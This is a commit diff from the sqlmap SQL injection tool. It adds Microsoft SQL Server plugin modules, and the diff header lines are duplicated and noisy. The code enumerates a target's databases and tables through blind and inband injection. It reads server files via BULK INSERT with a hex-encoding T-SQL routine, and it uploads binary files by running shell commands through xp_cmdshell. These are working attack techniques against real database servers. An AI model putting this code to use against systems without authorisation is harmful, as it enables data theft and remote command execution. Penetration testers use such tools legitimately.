JavaBasketball
diff --git a/‎plugins/dbms/access.py‎ ‎plugins/dbms/access/__init__.py‎plugins/dbms/access.py renamed to plugins/dbms/access/__init__.py b/‎plugins/dbms/access.py‎ ‎plugins/dbms/access/__init__.py‎plugins/dbms/access.py renamed to plugins/dbms/access/__init__.py
diff --git a/‎plugins/dbms/firebird.py‎ ‎plugins/dbms/firebird/__init__.py‎plugins/dbms/firebird.py renamed to plugins/dbms/firebird/__init__.py b/‎plugins/dbms/firebird.py‎ ‎plugins/dbms/firebird/__init__.py‎plugins/dbms/firebird.py renamed to plugins/dbms/firebird/__init__.py
diff --git a/‎plugins/dbms/mssqlserver.py‎
Lines changed: 0 additions & 694 deletions b/‎plugins/dbms/mssqlserver.py‎
Lines changed: 0 additions & 694 deletions
diff --git a/‎plugins/dbms/mssqlserver/__init__.py‎
Lines changed: 51 additions & 0 deletions b/‎plugins/dbms/mssqlserver/__init__.py‎
Lines changed: 51 additions & 0 deletions
diff --git a/‎plugins/dbms/mssqlserver/enumeration.py‎
Lines changed: 117 additions & 0 deletions b/‎plugins/dbms/mssqlserver/enumeration.py‎
Lines changed: 117 additions & 0 deletions
diff --git a/‎plugins/dbms/mssqlserver/filesystem.py‎
Lines changed: 217 additions & 0 deletions b/‎plugins/dbms/mssqlserver/filesystem.py‎
Lines changed: 217 additions & 0 deletions
@@ -0,0 +1,51 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+from lib.core.settings import MSSQL_SYSTEM_DBS
+from lib.core.unescaper import unescaper
+
+from plugins.dbms.mssqlserver.enumeration import Enumeration
+from plugins.dbms.mssqlserver.filesystem import Filesystem
+from plugins.dbms.mssqlserver.fingerprint import Fingerprint
+from plugins.dbms.mssqlserver.syntax import Syntax
+from plugins.dbms.mssqlserver.takeover import Takeover
+from plugins.generic.misc import Miscellaneous
+
+
+class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
+    """
+    This class defines Microsoft SQL Server methods
+    """
+
+    def __init__(self):
+        self.excludeDbsList = MSSQL_SYSTEM_DBS
+
+        Syntax.__init__(self)
+        Fingerprint.__init__(self)
+        Enumeration.__init__(self)
+        Filesystem.__init__(self)
+        Miscellaneous.__init__(self)
+        Takeover.__init__(self)
+
+        unescaper.setUnescape(MSSQLServerMap.unescape)
@@ -0,0 +1,117 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.exception import sqlmapNoneDataException
+from lib.request import inject
+
+from plugins.generic.enumeration import Enumeration as GenericEnumeration
+
+class Enumeration(GenericEnumeration):
+    def __init__(self):
+        GenericEnumeration.__init__(self, "Microsoft SQL Server")
+
+    def getPrivileges(self):
+        warnMsg  = "on Microsoft SQL Server it is not possible to fetch "
+        warnMsg += "database users privileges"
+        logger.warn(warnMsg)
+
+        return {}
+
+    def getTables(self):
+        infoMsg = "fetching tables"
+        if conf.db:
+            infoMsg += " for database '%s'" % conf.db
+        logger.info(infoMsg)
+
+        rootQuery = queries[kb.dbms].tables
+
+        if not conf.db:
+            if not len(kb.data.cachedDbs):
+                dbs = self.getDbs()
+            else:
+                dbs = kb.data.cachedDbs
+        else:
+            if "," in conf.db:
+                dbs = conf.db.split(",")
+            else:
+                dbs = [conf.db]
+
+        if kb.unionPosition:
+            for db in dbs:
+                if conf.excludeSysDbs and db in self.excludeDbsList:
+                    infoMsg = "skipping system database '%s'" % db
+                    logger.info(infoMsg)
+
+                    continue
+
+                query = rootQuery["inband"]["query"] % db
+                value = inject.getValue(query, blind=False)
+
+                if value:
+                    kb.data.cachedTables[db] = value
+
+        if not kb.data.cachedTables:
+            for db in dbs:
+                if conf.excludeSysDbs and db in self.excludeDbsList:
+                    infoMsg = "skipping system database '%s'" % db
+                    logger.info(infoMsg)
+
+                    continue
+
+                infoMsg  = "fetching number of tables for "
+                infoMsg += "database '%s'" % db
+                logger.info(infoMsg)
+
+                query = rootQuery["blind"]["count"] % db
+                count = inject.getValue(query, inband=False, charsetType=2)
+
+                if not count.isdigit() or not len(count) or count == "0":
+                    warnMsg  = "unable to retrieve the number of "
+                    warnMsg += "tables for database '%s'" % db
+                    logger.warn(warnMsg)
+                    continue
+
+                tables = []
+
+                for index in range(int(count)):
+                    query = rootQuery["blind"]["query"] % (db, index, db)
+                    table = inject.getValue(query, inband=False)
+                    tables.append(table)
+
+                if tables:
+                    kb.data.cachedTables[db] = tables
+                else:
+                    warnMsg  = "unable to retrieve the tables "
+                    warnMsg += "for database '%s'" % db
+                    logger.warn(warnMsg)
+
+        if not kb.data.cachedTables:
+            errMsg = "unable to retrieve the tables for any database"
+            raise sqlmapNoneDataException(errMsg)
+
+        return kb.data.cachedTables
@@ -0,0 +1,217 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import os
+
+from lib.core.common import getRange
+from lib.core.common import posixToNtSlashes
+from lib.core.common import randomStr
+from lib.core.convert import urlencode
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.exception import sqlmapNoneDataException
+from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.request import inject
+
+from plugins.generic.filesystem import Filesystem as GenericFilesystem
+
+class Filesystem(GenericFilesystem):
+    def __init__(self):
+        GenericFilesystem.__init__(self)
+
+    def unionReadFile(self, rFile):
+        errMsg  = "Microsoft SQL Server does not support file reading "
+        errMsg += "with UNION query SQL injection technique"
+        raise sqlmapUnsupportedFeatureException(errMsg)
+
+    def stackedReadFile(self, rFile):
+        infoMsg = "fetching file: '%s'" % rFile
+        logger.info(infoMsg)
+
+        result = []
+        txtTbl = self.fileTblName
+        hexTbl = "%shex" % self.fileTblName
+
+        self.createSupportTbl(txtTbl, self.tblField, "text")
+        inject.goStacked("DROP TABLE %s" % hexTbl)
+        inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
+
+        logger.debug("loading the content of file '%s' into support table" % rFile)
+        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
+
+        # Reference: http://support.microsoft.com/kb/104829
+        binToHexQuery = """
+        DECLARE @charset VARCHAR(16)
+        DECLARE @counter INT
+        DECLARE @hexstr VARCHAR(4096)
+        DECLARE @length INT
+        DECLARE @chunk INT
+
+        SET @charset = '0123456789ABCDEF'
+        SET @counter = 1
+        SET @hexstr = ''
+        SET @length = (SELECT DATALENGTH(%s) FROM %s)
+        SET @chunk = 1024
+
+        WHILE (@counter <= @length)
+        BEGIN
+            DECLARE @tempint INT
+            DECLARE @firstint INT
+            DECLARE @secondint INT
+
+            SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))
+            SET @firstint = floor(@tempint/16)
+            SET @secondint = @tempint - (@firstint * 16)
+            SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint+1, 1) + SUBSTRING(@charset, @secondint+1, 1)
+
+            SET @counter = @counter + 1
+
+            IF @counter %% @chunk = 0
+            BEGIN
+                INSERT INTO %s(%s) VALUES(@hexstr)
+                SET @hexstr = ''
+            END
+        END
+
+        IF @counter %% (@chunk) != 0
+        BEGIN
+            INSERT INTO %s(%s) VALUES(@hexstr)
+        END
+        """ % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
+
+        binToHexQuery = binToHexQuery.replace("    ", "").replace("\n", " ")
+        binToHexQuery = urlencode(binToHexQuery, convall=True)
+        inject.goStacked(binToHexQuery)
+
+        if kb.unionPosition:
+            result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), sort=False, resumeValue=False, blind=False)
+
+        if not result:
+            result = []
+            count  = inject.getValue("SELECT COUNT(%s) FROM %s" % (self.tblField, hexTbl), resumeValue=False, charsetType=2)
+
+            if not count.isdigit() or not len(count) or count == "0":
+                errMsg  = "unable to retrieve the content of the "
+                errMsg += "file '%s'" % rFile
+                raise sqlmapNoneDataException(errMsg)
+
+            indexRange = getRange(count)
+
+            for index in indexRange:
+                chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, sort=False, charsetType=3)
+                result.append(chunk)
+
+        inject.goStacked("DROP TABLE %s" % hexTbl)
+
+        return result
+
+    def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
+        errMsg  = "Microsoft SQL Server does not support file upload with "
+        errMsg += "UNION query SQL injection technique"
+        raise sqlmapUnsupportedFeatureException(errMsg)
+
+    def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
+        # NOTE: this is needed here because we use xp_cmdshell extended
+        # procedure to write a file on the back-end Microsoft SQL Server
+        # file system. Maybe it won't be required to write text files
+        self.initEnv()
+
+        self.getRemoteTempPath()
+
+        debugMsg  = "going to use xp_cmdshell extended procedure to write "
+        debugMsg += "the %s file content to file '%s'" % (fileType, dFile)
+        logger.debug(debugMsg)
+
+        debugSize    = 0xFF00
+        tmpPath      = posixToNtSlashes(conf.tmpPath)
+        dFileName    = os.path.split(dFile)[1]
+        dFile        = posixToNtSlashes(dFile)
+        wFileSize    = os.path.getsize(wFile)
+        wFilePointer = open(wFile, "rb")
+        wFileContent = wFilePointer.read()
+        wFilePointer.close()
+
+        if wFileSize < debugSize:
+            chunkName = self.updateBinChunk(wFileContent, tmpPath)
+            sFile     = "%s\%s" % (tmpPath, dFileName)
+
+            logger.debug("moving binary file %s to %s" % (sFile, dFile))
+
+            commands   = ("cd %s" % tmpPath,
+                          "ren %s %s" % (chunkName, dFileName),
+                          "move /Y %s %s" % (dFileName, dFile))
+            complComm  = " & ".join(command for command in commands)
+            forgedCmd  = self.xpCmdshellForgeCmd(complComm)
+
+            self.execCmd(forgedCmd)
+
+        else:
+            infoMsg  = "the %s file is bigger than %d " % (fileType, debugSize)
+            infoMsg += "bytes. sqlmap will split it into chunks, upload "
+            infoMsg += "them and recreate the original file out of the "
+            infoMsg += "binary chunks server-side, wait.."
+            logger.info(infoMsg)
+
+            counter = 1
+
+            for i in range(0, wFileSize, debugSize):
+                wFileChunk = wFileContent[i:i + debugSize]
+                chunkName  = self.updateBinChunk(wFileChunk, tmpPath)
+
+                if i == 0:
+                    infoMsg = "renaming chunk "
+                    copyCmd = "ren %s %s" % (chunkName, dFileName)
+                else:
+                    infoMsg = "appending chunk "
+                    copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
+
+                infoMsg += "%s\%s to %s\%s" % (tmpPath, chunkName, tmpPath, dFileName)
+                logger.debug(infoMsg)
+
+                commands   = ("cd %s" % tmpPath,
+                               copyCmd,
+                               "del /F %s" % chunkName)
+                complComm  = " & ".join(command for command in commands)
+                forgedCmd  = self.xpCmdshellForgeCmd(complComm)
+
+                self.execCmd(forgedCmd)
+
+                logger.info("file chunk %d written" % counter)
+
+                counter += 1
+
+            sFile = "%s\%s" % (tmpPath, dFileName)
+
+            logger.debug("moving binary file %s to %s" % (sFile, dFile))
+
+            commands  = ("cd %s" % tmpPath,
+                         "move /Y %s %s" % (dFileName, dFile))
+            complComm = " & ".join(command for command in commands)
+            forgedCmd = self.xpCmdshellForgeCmd(complComm)
+
+            self.execCmd(forgedCmd)
+
+        if confirm:
+            self.askCheckWrittenFile(wFile, dFile, fileType)